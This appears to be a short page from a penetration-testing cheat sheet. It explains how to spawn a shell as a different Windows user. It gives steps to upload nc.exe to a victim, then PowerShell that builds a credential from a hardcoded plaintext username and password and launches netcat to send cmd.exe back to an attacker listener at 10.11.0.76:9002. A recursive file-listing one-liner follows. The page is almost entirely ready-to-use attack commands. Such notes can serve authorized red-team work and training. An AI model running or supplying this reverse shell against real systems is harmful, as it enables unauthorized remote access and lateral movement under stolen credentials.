Spawn Shell as a different user

  • startup a netcat listener on your attacking machine

  • upload the nc.exe binary to the victim

  • execute the powershell commands below to connect back to your nc listener as the other user

$username = 'alice'

$password = 'aliceishere'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

Start-Process nc.exe -ArgumentList "-e C:\Windows\System32\cmd.exe 10.11.0.76 9002" -Credential $credential

View all files recursively

gci -recurse . | select fullname

PreviousExfil to WebHookNextRED Teaming

Last updated